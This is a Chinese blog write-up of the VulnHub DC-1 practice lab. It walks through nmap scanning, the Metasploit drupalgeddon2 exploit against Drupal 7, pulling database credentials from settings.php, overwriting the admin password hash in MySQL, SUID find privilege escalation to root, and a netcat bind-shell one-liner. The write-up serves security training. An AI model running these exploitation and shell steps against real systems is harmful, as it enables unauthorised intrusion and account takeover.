vuln靶场——DC-1

最新推荐文章于 2024-05-03 19:17:57 发布
最新推荐文章于 2024-05-03 19:17:57 发布
阅读量1k 收藏 30
点赞数 29
分类专栏: 靶场练习 文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54480761/article/details/138412721
版权

环境搭建

靶机描述

DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。

下载靶场环境

DC: 1 ~ VulnHub

启动靶场环境

点击导入,如果报错可以点击重试

导入完成之后打开后把网络模式设置为NAT模式。

渗透靶场

本环境主要在于以下两个知识点

  1. Drupal 7 漏洞利用   (Drupal 7是一款开源的内容管理系统,它基于 PHP 和 MySQL 构建,被广泛用于创建各种类型的网站和应用程序)
  2. find 提权  (Find提权通常指的是在计算机系统中利用漏洞或漏洞组合来获取更高的权限)

信息收集

寻找真实IP

使用nmap工具进行主机发现

nmap -sP 192.168.178.1/24

得到主机IP为192.168.178.108

扫描端口及服务

nmap -A -p- -v 192.168.178.108

ip地址、开放22端口、开放80端口、扫描到了robot.txt文档、使用的Apache2.2、使用的Drupal 7

访问web站点

http://192.168.178.108/

利用MSF渗透

典型的drupal,启动Metersploit,MSF存在drupal模块,尝试使用msf渗透

MSF简单命令介绍

msfconsole		进入MSF控制台
search 			搜索相应模块
use           		对应模块
show options  		查看信息
set RHOST  		远程主机ip
run           		攻击

搜索Drupal 7的漏洞

搜索Drupal 7的漏洞发现可利用的漏洞很多,搜索与Drupal 7相关的漏洞利用模块

searchsploit Drupal 7

进入MSF控制台搜索drupal模块

msfconsole
search drupal

选择模块进行测试

使用2018的测试

use exploit/unix/webapp/drupal_drupalgeddon2

设置靶机IP运行msf

set rhosts 192.168.178.108

run

成功获取权限

进入shell

输入id,

shell
id

执行whoami,查询当前用户的身份信息

whoami

发现是www-data用户权限

发现flag4.txt文件

进入home目录,发现flag4.txt文件,提示需要提升权限

使用python反弹一个交互式shell
python -c "import pty;pty.spawn('/bin/bash')"

将当前的shell提升一个交互式的shell,以便执行更多的命令和操作。

进入到www目录,发现flag1文件

查看www目录下文件,发现flag1.txt文件,打开发现提示信息,内容提示寻找站点的配置文件

cd /var/www/
ls
cat flag1.txt

发现flag2

Drupal的默认配置文件

Drupal 默认安装的目录结构-腾讯云开发者社区-腾讯云

/var/www/sites/default/settings.php

查看文件内容

cat /var/www/sites/default/settings.php

发现了flag2和数据库的账号密码

 flag2提示,提升权限为root来查看敏感文件,或者直接爆破

数据库:drupaldb
帐号:dbuser
密码:R0ck3t

我们先进入数据库查看

mysql -u dbuser -p

查看数据库,切换到drupaldb数据库,查看查找默认的users

show databases;
use drupaldb;
select * from users;

发现admin信息

置换drupal密码(两种方法)

https://www.cnblogs.com/wicub/p/3582637.html

drupal mysql hash密码_【Drupal】如何重置Drupal 7的用户密码-CSDN博客

进入www目录,站点路径下执行脚本,生成新密码

quit;
cd /var/www/
php scripts/password-hash.sh 新密码

$S$D6KBbrqTHP5u/1bXnH4YfYPUMnI4E3JfEjNw6Du86.rEBzXQ/qcP

然后在进入数据库中把密码字段进行替换
进入mysql,输入密码,切换到drupaldb数据库,将pass字段进行替换

mysql -u dbuser -p
R0ck3t
use drupaldb
update users set pass="$S$D6KBbrqTHP5u/1bXnH4YfYPUMnI4E3JfEjNw6Du86.rEBzXQ/qcP" where name="admin";

登录站点

http://192.168.178.108/

进行登录,密码是之前我们自己替换的

admin
123456

成功登录

发现flag3

登陆战点之后,随便点几个选项,例如左上角的Content,发现flag3

点击flag3进入,发现提示信息

quit;退出数据库,然后使用命令查看 suid 权限的可执行二进制程序

find提权

https://www.cnblogs.com/aaak/p/15718561.html

ls -l  /usr/bin/find

find / -perm -4000 2>/dev/null

使用命令测试,发现为root权限

touch 666   (创建一个为666的空文件夹)
ls
find / -name 666 -exec "whoami" \;


find  (一个路径或文件必须存在)  -exec  执行命令 (结束)\;
find  /usr/bin/find -exec "whoami" \;

我们切换语句进入shell,执行whoami查看当前的权限,执行ls查看当前目录下的文件,切换到root目录

find / -name 666 -exec "/bin/sh" \;  
whoami
ls
cd /root
ls

查看thefinalflag.txt文件

cat thefinalflag.txt

另一种思路,natcat监听,远程连接

https://www.cnblogs.com/fandt/p/17331999.html


find /usr/bin/find -exec netcat -lvp 5555 -e /bin/sh \;

天赋酬勤
关注
  • 29
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
vulnhub靶场渗透练习详解——DC9
weixin_51011609的博客
08-19 2020
vulnhub靶场渗透练习详解——DC9
渗透靶场——vulntarget-a(完整版)
tlovejr的博客
03-25 5886
部署环境 此次靶场不再是单个镜像,而是三个镜像文件,接下来先给大家说一下整个环境的拓扑图以环境布置。 只需要把win7外网机和kali机同样的网卡host-Only形式即可,剩下的两台即可也是直接安排好了,无需做任何更改。 靶机下载地址: 信息收集 扫描主机 扫描同一网段中的存活主机 发现一个存活主机(其他的是我自己其他机器)192.168.1.9 扫描端口 扫描一下存活靶机的ip地址 nmap -A -p- 192.168.1.9 一看就知道这个存活靶机是一个win7系统,那么对于win7系统来说,4
vuln-dev-env
02-20
开发环境 要求: 虚拟箱6.1 流浪汉 遵循的步骤: 通过运行以下命令将此仓库克隆到您的主机中: vagrant up 使用以下凭据登录到虚拟机: username: vagrant password: vagrant 运行配置脚本: sudo ./scripts/dev-env.sh 脚本运行完成后,执行以下命令: sudo shutdown now -r 环境重新启动后,运行以下命令: ./scripts/virtualbox-setup.sh ./scripts/practicum-setup.sh
vuln靶场——DC-2
最新发布
qq_54480761的博客
05-03 592
报错显示未重定向,需要修改本地DNS文件(尽量在kali中修改,因为我们还要使用相应工具),同时7744端口使用的是ssh协议,后续可以尝试ssh爆破登录。Drupal 7 漏洞利用 (Drupal 7是一款开源的内容管理系统,它基于 PHP 和 MySQL 构建,被广泛用于创建各种类型的网站和应用程序)发现后台管理登录界面,尝试爆破登录,flag1提示我们也许需要使用cewl进行生成字典。查看环境变量,发现可以执行的只有四个命令,less、ls、vi、scp。本环境主要在于以下两个知识点。
Vulnhub靶机渗透学习——DC-1
qq_45612828的博客
10-13 111
Metasploit的EXP使用drupal 7的漏洞通过配置文件获取数据库账号数据库更新密码SUID 提权——find。
Vulnhub靶机渗透测试——DC-3
Cobra的博客
04-26 3341
一、实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu16.04): 192.168.189.182 靶机下载地址:DC: 3.2 ~ VulnHub 二、信息收集 1、使用nmap扫描存活主机 2、发现IP192.168.189.182开放80端口,再对其进行nmap扫描 nmap -sV -A -T4 192.168.189.182 3、通过扫描结果我们发现其指纹信息为joomla,访问其80端口 4、使用dirsearch对其进行目.
ledger-app-monero-1.42-vuln:CVE-2020-6861的PoC存储库:Ledger Monero App支出密钥提取
02-04
CVE-2020-6861:Ledger Monero App支出密钥提取 文章的PoC存储库:
hcraft - HTTP Vuln Request Crafter-开源
04-24
hcraft是一个HTTP系统渗透测试框架,旨在使HTTP系统中已知漏洞的利用成为一个动态,简单的过程。
nmap-vuln-scan
02-18
nmap-vuln-scan
ThinkPHP-Vuln-master.zip
08-05
tp历史漏洞
vuln-cookies:饼干vukn
03-30
追捕后端 适用于vmc-cloud Project Vulnhunting的API REST 在位于config / config.json中的文件中配置数据库凭据 安装依赖项npm install 创建数据库npm运行create-db 运行迁移npm run migration-db ...
xss-vuln学习通关总结
08-24
个人总结类文档。
Struts2-Vuln-Demo:Struts2防御实例
03-08
前言 开始学习struts2代码审计时,发现各位师傅分析分析的文章很多,但是给突破demo源码的却很少。并且很多重复复现是在struts2官方案例上进行的。而官方案例代码太多,对于初学者来说无法快速聚焦突破点。...
vuln-scanner-flask:Flask应用程序可用于扫描网站上的(xss,sql)漏洞
04-06
创伤扫描瓶 Flask应用程序可用于扫描网站上的(xss,sql)漏洞
vuln-headers-extension:Firefox扩展,可解析通过您的Firefox浏览器流过的所有请求的标头以检测漏洞
02-05
外伤标头扩展这是firefox扩展名,它在转发到DNS服务器之前先解析请求,以扫描由于导致的易受攻击的URL。...屏幕截图安装方法1- 克隆仓库或将其分叉。 打开Firefox并在URL栏中加载about:debugging 。
java 反序列化利用工具marshalsec-0.0.3-SNAPSHOT-all
12-27
marshalsec命令格式如下: java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> []] 参数说明: -a:生成exploit下的所有payload(例如:hessian下的...
github-vuln-scraper:GitHub的漏洞收集器
02-04
GitHub漏洞抓取工具 GitHub的此漏洞收集程序是TU Darmstadt演讲的一部分。 建立 器将用于python环境。 direnv allow pip3 install requirements.txt 用法 请使用您自己的替换conf / config.py中的PERSONAL_ACCESS_...
ThinkPHP-Vuln-Demo:ThinkPHP例程实例
03-23
ThinkPHP-Vuln-Demo ThinkPHP例程实例源码
nmap --script=vuln
06-28
### 回答1: nmap --script=vuln是一个nmap命令,用于扫描目标主机的漏洞。该命令会使用nmap的漏洞扫描脚本(vuln)来检测目标主机上可能存在的漏洞。使用该命令可以帮助管理员及时发现并修复系统中的漏洞,提高系统的安全性。 ### 回答2: nmap是一种常用的网络扫描工具,可以用来检测网络上的设备并识别它们的服务和操作系统信息。同时,nmap还提供了一些强大的脚本和工具箱,以帮助用户发现系统中可能存在的漏洞。 使用“nmap --script=vuln”命令可以使用nmap内置的漏洞扫描脚本,这些脚本能够检测目标系统中可能存在的安全漏洞。该命令会启用所有的漏洞扫描脚本,并提供有关目标系统检测结果的详细信息。 在使用“nmap --script=vuln”命令进行漏洞扫描时,可以通过在命令行上使用“-p”参数来指定要扫描的端口范围。对于大型网络中的目标系统,也可以通过指定IP地址范围或使用文件来进行扫描。 当nmap执行漏洞扫描脚本时,脚本会自动检测目标系统中存在的漏洞并生成报告。该报告包含了有关检测到的漏洞的详细信息,例如漏洞名称、等级和漏洞对应的CVE编号等。在扫描过程中,可以使用“-vvv”参数来显示更详细的扫描信息,以便更好地了解扫描的情况。 对于系统管理员和安全专业人士来说,nmap的漏洞扫描功能对于确保系统安全和保护系统免受攻击至关重要。然而,使用该命令进行系统扫描和漏洞检测需要谨慎,因为它可能会导致系统故障或误报漏洞。在使用nmap进行系统扫描之前,确保您已经获得同意,并且对扫描的目标系统进行备份和恢复。 ### 回答3: nmap是一款用于扫描网络主机的开源工具,其功能强大,支持多种操作系统。nmap自带的脚本能够实现许多针对主机的基本漏洞测试,其中就包括vuln脚本。 nmap --script=vuln是指使用vuln脚本来扫描目标网络主机,该脚本是nmap自带的一个组件,用于检测主机是否存在已知的漏洞。如果存在漏洞,则通过输出详细的报告提供可能存在的风险。 使用vuln脚本的方式简单直接,只需要在nmap命令行后加上--script=vuln即可进行扫描。扫描完毕后,nmap会输出详细报告,包含目标主机的漏洞及可能受到的影响。 总体来说,nmap --script=vuln用于检测目标网络主机的漏洞并提供风险报告,有效促进网络安全运营。但是需要注意的是,该脚本只能检测到已知的漏洞,因此不能完全替代其他安全测试工具的使用。在实际应用中,应该综合考虑多种工具的使用,提升网络安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值